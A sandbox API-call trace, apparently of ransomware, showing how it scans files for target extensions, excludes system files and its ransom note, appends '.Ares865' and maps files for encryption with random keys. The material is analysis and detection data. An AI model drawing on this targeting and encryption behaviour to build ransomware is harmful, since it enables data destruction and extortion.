[0084.620] lstrlenW (lpString="eco") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.620] lstrlenW (lpString="ecx") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.620] lstrlenW (lpString="edb") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.620] lstrlenW (lpString="epim") returned 4 [0084.620] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.620] lstrlenW (lpString="fcd") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.620] lstrlenW (lpString="fdb") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.620] lstrlenW (lpString="fic") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.620] lstrlenW (lpString="flexolibrary") returned 12 [0084.620] lstrcmpiW (lpString1="ertile10.bmp", lpString2="flexolibrary") returned -1 [0084.620] lstrlenW (lpString="fm5") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.620] lstrlenW (lpString="fmp") returned 3 [0084.620] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.620] lstrlenW (lpString="fmp12") returned 5 [0084.621] lstrcmpiW (lpString1="0.bmp", lpString2="fmp12") returned -1 [0084.621] lstrlenW (lpString="fmpsl") returned 5 [0084.621] lstrcmpiW (lpString1="0.bmp", lpString2="fmpsl") returned -1 [0084.621] lstrlenW (lpString="fol") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.621] lstrlenW (lpString="fp3") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.621] lstrlenW (lpString="fp4") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.621] lstrlenW (lpString="fp5") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.621] lstrlenW (lpString="fp7") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.621] lstrlenW (lpString="fpt") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.621] lstrlenW (lpString="frm") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.621] lstrlenW (lpString="gdb") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.621] lstrlenW (lpString="gdb") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.621] lstrlenW (lpString="grdb") returned 4 [0084.621] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.621] lstrlenW (lpString="gwi") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.621] lstrlenW (lpString="hdb") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.621] lstrlenW (lpString="his") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.621] lstrlenW (lpString="ib") returned 2 [0084.621] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.621] lstrlenW (lpString="idb") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.621] lstrlenW (lpString="ihx") returned 3 [0084.621] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.621] lstrlenW (lpString="itdb") returned 4 [0084.621] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.622] lstrlenW (lpString="itw") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.622] lstrlenW (lpString="jet") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.622] lstrlenW (lpString="jtx") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.622] lstrlenW (lpString="kdb") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.622] lstrlenW (lpString="kexi") returned 4 [0084.622] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.622] lstrlenW (lpString="kexic") returned 5 [0084.622] lstrcmpiW (lpString1="0.bmp", lpString2="kexic") returned -1 [0084.622] lstrlenW (lpString="kexis") returned 5 [0084.622] lstrcmpiW (lpString1="0.bmp", lpString2="kexis") returned -1 [0084.622] lstrlenW (lpString="lgc") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.622] lstrlenW (lpString="lwx") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.622] lstrlenW (lpString="maf") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.622] lstrlenW (lpString="maq") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.622] lstrlenW (lpString="mar") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.622] lstrlenW (lpString="marshal") returned 7 [0084.622] lstrcmpiW (lpString1="e10.bmp", lpString2="marshal") returned -1 [0084.622] lstrlenW (lpString="mas") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.622] lstrlenW (lpString="mav") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.622] lstrlenW (lpString="maw") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.622] lstrlenW (lpString="mdbhtml") returned 7 [0084.622] lstrcmpiW (lpString1="e10.bmp", lpString2="mdbhtml") returned -1 [0084.622] lstrlenW (lpString="mdn") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.622] lstrlenW (lpString="mdt") returned 3 [0084.622] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.623] lstrlenW (lpString="mfd") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.623] lstrlenW (lpString="mpd") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.623] lstrlenW (lpString="mrg") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.623] lstrlenW (lpString="mud") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.623] lstrlenW (lpString="mwb") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.623] lstrlenW (lpString="myd") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.623] lstrlenW (lpString="ndf") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.623] lstrlenW (lpString="nnt") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.623] lstrlenW (lpString="nrmlib") returned 6 [0084.623] lstrcmpiW (lpString1="10.bmp", lpString2="nrmlib") returned -1 [0084.623] lstrlenW (lpString="ns2") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.623] lstrlenW (lpString="ns3") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.623] lstrlenW (lpString="ns4") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.623] lstrlenW (lpString="nsf") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.623] lstrlenW (lpString="nv") returned 2 [0084.623] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.623] lstrlenW (lpString="nv2") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.623] lstrlenW (lpString="nwdb") returned 4 [0084.623] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.623] lstrlenW (lpString="nyf") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.623] lstrlenW (lpString="odb") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.623] lstrlenW (lpString="odb") returned 3 [0084.623] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.624] lstrlenW (lpString="oqy") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.624] lstrlenW (lpString="ora") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.624] lstrlenW (lpString="orx") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.624] lstrlenW (lpString="owc") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.624] lstrlenW (lpString="p96") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.624] lstrlenW (lpString="p97") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.624] lstrlenW (lpString="pan") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.624] lstrlenW (lpString="pdb") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.624] lstrlenW (lpString="pdm") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.624] lstrlenW (lpString="pnz") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.624] lstrlenW (lpString="qry") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.624] lstrlenW (lpString="qvd") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.624] lstrlenW (lpString="rbf") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.624] lstrlenW (lpString="rctd") returned 4 [0084.624] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.624] lstrlenW (lpString="rod") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.624] lstrlenW (lpString="rodx") returned 4 [0084.624] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.624] lstrlenW (lpString="rpd") returned 3 [0084.624] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.625] lstrlenW (lpString="rsd") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.625] lstrlenW (lpString="sas7bdat") returned 8 [0084.625] lstrcmpiW (lpString1="le10.bmp", lpString2="sas7bdat") returned -1 [0084.625] lstrlenW (lpString="sbf") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.625] lstrlenW (lpString="scx") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.625] lstrlenW (lpString="sdb") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.625] lstrlenW (lpString="sdc") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.625] lstrlenW (lpString="sdf") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.625] lstrlenW (lpString="sis") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.625] lstrlenW (lpString="spq") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.625] lstrlenW (lpString="te") returned 2 [0084.625] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.625] lstrlenW (lpString="teacher") returned 7 [0084.625] lstrcmpiW (lpString1="e10.bmp", lpString2="teacher") returned -1 [0084.625] lstrlenW (lpString="tmd") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.625] lstrlenW (lpString="tps") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.625] lstrlenW (lpString="trc") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.625] lstrlenW (lpString="trc") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.625] lstrlenW (lpString="trm") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.625] lstrlenW (lpString="udb") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.625] lstrlenW (lpString="udl") returned 3 [0084.625] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.625] lstrlenW (lpString="usr") returned 3 [0084.626] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.626] lstrlenW (lpString="v12") returned 3 [0084.626] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.626] lstrlenW (lpString="vis") returned 3 [0084.626] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.626] lstrlenW (lpString="vpd") returned 3 [0084.626] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.626] lstrlenW (lpString="vvv") returned 3 [0084.626] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.626] lstrlenW (lpString="wdb") returned 3 [0084.626] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.626] lstrlenW (lpString="wmdb") returned 4 [0084.626] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.626] lstrlenW (lpString="wrk") returned 3 [0084.626] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.626] lstrlenW (lpString="xdb") returned 3 [0084.626] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.626] lstrlenW (lpString="xld") returned 3 [0084.626] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.626] lstrlenW (lpString="xmlff") returned 5 [0084.626] lstrcmpiW (lpString1="0.bmp", lpString2="xmlff") returned -1 [0084.626] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.Ares865") returned 90 [0084.626] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp.ares865"), dwFlags=0x1) returned 1 [0084.629] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.629] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.629] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.630] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.630] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.630] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.631] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.632] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.644] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.645] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.645] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0084.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0084.645] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.645] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.646] CloseHandle (hObject=0x15c) returned 1 [0084.646] CloseHandle (hObject=0x118) returned 1 [0084.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.646] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.647] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb5a2927, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile11.bmp", cAlternateFileName="")) returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="aoldtz.exe") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2=".") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="..") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="windows") returned -1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="bootmgr") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="temp") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="pagefile.sys") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="boot") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="ids.txt") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="ntuser.dat") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="perflogs") returned 1 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2="MSBuild") returned 1 [0084.647] lstrlenW (lpString="usertile11.bmp") returned 14 [0084.647] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned 82 [0084.647] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile11.bmp" | out: lpString1="usertile11.bmp") returned="usertile11.bmp" [0084.647] lstrlenW (lpString="usertile11.bmp") returned 14 [0084.647] lstrlenW (lpString="Ares865") returned 7 [0084.647] lstrcmpiW (lpString1="e11.bmp", lpString2="Ares865") returned 1 [0084.647] lstrlenW (lpString=".dll") returned 4 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2=".dll") returned 1 [0084.647] lstrlenW (lpString=".lnk") returned 4 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2=".lnk") returned 1 [0084.647] lstrlenW (lpString=".ini") returned 4 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2=".ini") returned 1 [0084.647] lstrlenW (lpString=".sys") returned 4 [0084.647] lstrcmpiW (lpString1="usertile11.bmp", lpString2=".sys") returned 1 [0084.647] lstrlenW (lpString="usertile11.bmp") returned 14 [0084.647] lstrlenW (lpString="bak") returned 3 [0084.647] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.647] lstrlenW (lpString="ba_") returned 3 [0084.647] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.647] lstrlenW (lpString="dbb") returned 3 [0084.647] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.647] lstrlenW (lpString="vmdk") returned 4 [0084.648] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.648] lstrlenW (lpString="rar") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.648] lstrlenW (lpString="zip") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.648] lstrlenW (lpString="tgz") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.648] lstrlenW (lpString="vbox") returned 4 [0084.648] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.648] lstrlenW (lpString="vdi") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.648] lstrlenW (lpString="vhd") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.648] lstrlenW (lpString="vhdx") returned 4 [0084.648] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.648] lstrlenW (lpString="avhd") returned 4 [0084.648] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.648] lstrlenW (lpString="db") returned 2 [0084.648] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.648] lstrlenW (lpString="db2") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.648] lstrlenW (lpString="db3") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.648] lstrlenW (lpString="dbf") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.648] lstrlenW (lpString="mdf") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.648] lstrlenW (lpString="mdb") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.648] lstrlenW (lpString="sql") returned 3 [0084.648] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.648] lstrlenW (lpString="sqlite") returned 6 [0084.648] lstrcmpiW (lpString1="11.bmp", lpString2="sqlite") returned -1 [0084.648] lstrlenW (lpString="sqlite3") returned 7 [0084.648] lstrcmpiW (lpString1="e11.bmp", lpString2="sqlite3") returned -1 [0084.648] lstrlenW (lpString="sqlitedb") returned 8 [0084.648] lstrcmpiW (lpString1="le11.bmp", lpString2="sqlitedb") returned -1 [0084.649] lstrlenW (lpString="xml") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.649] lstrlenW (lpString="$er") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.649] lstrlenW (lpString="4dd") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.649] lstrlenW (lpString="4dl") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.649] lstrlenW (lpString="^^^") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.649] lstrlenW (lpString="abs") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.649] lstrlenW (lpString="abx") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.649] lstrlenW (lpString="accdb") returned 5 [0084.649] lstrcmpiW (lpString1="1.bmp", lpString2="accdb") returned -1 [0084.649] lstrlenW (lpString="accdc") returned 5 [0084.649] lstrcmpiW (lpString1="1.bmp", lpString2="accdc") returned -1 [0084.649] lstrlenW (lpString="accde") returned 5 [0084.649] lstrcmpiW (lpString1="1.bmp", lpString2="accde") returned -1 [0084.649] lstrlenW (lpString="accdr") returned 5 [0084.649] lstrcmpiW (lpString1="1.bmp", lpString2="accdr") returned -1 [0084.649] lstrlenW (lpString="accdt") returned 5 [0084.649] lstrcmpiW (lpString1="1.bmp", lpString2="accdt") returned -1 [0084.649] lstrlenW (lpString="accdw") returned 5 [0084.649] lstrcmpiW (lpString1="1.bmp", lpString2="accdw") returned -1 [0084.649] lstrlenW (lpString="accft") returned 5 [0084.649] lstrcmpiW (lpString1="1.bmp", lpString2="accft") returned -1 [0084.649] lstrlenW (lpString="adb") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.649] lstrlenW (lpString="adb") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.649] lstrlenW (lpString="ade") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.649] lstrlenW (lpString="adf") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.649] lstrlenW (lpString="adn") returned 3 [0084.649] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.650] lstrlenW (lpString="adp") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.650] lstrlenW (lpString="alf") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.650] lstrlenW (lpString="ask") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.650] lstrlenW (lpString="btr") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.650] lstrlenW (lpString="cat") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.650] lstrlenW (lpString="cdb") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.650] lstrlenW (lpString="ckp") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.650] lstrlenW (lpString="cma") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.650] lstrlenW (lpString="cpd") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.650] lstrlenW (lpString="dacpac") returned 6 [0084.650] lstrcmpiW (lpString1="11.bmp", lpString2="dacpac") returned -1 [0084.650] lstrlenW (lpString="dad") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.650] lstrlenW (lpString="dadiagrams") returned 10 [0084.650] lstrcmpiW (lpString1="tile11.bmp", lpString2="dadiagrams") returned 1 [0084.650] lstrlenW (lpString="daschema") returned 8 [0084.650] lstrcmpiW (lpString1="le11.bmp", lpString2="daschema") returned 1 [0084.650] lstrlenW (lpString="db-journal") returned 10 [0084.650] lstrcmpiW (lpString1="tile11.bmp", lpString2="db-journal") returned 1 [0084.650] lstrlenW (lpString="db-shm") returned 6 [0084.650] lstrcmpiW (lpString1="11.bmp", lpString2="db-shm") returned -1 [0084.650] lstrlenW (lpString="db-wal") returned 6 [0084.650] lstrcmpiW (lpString1="11.bmp", lpString2="db-wal") returned -1 [0084.650] lstrlenW (lpString="dbc") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.650] lstrlenW (lpString="dbs") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.650] lstrlenW (lpString="dbt") returned 3 [0084.650] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.651] lstrlenW (lpString="dbv") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.651] lstrlenW (lpString="dbx") returned 3 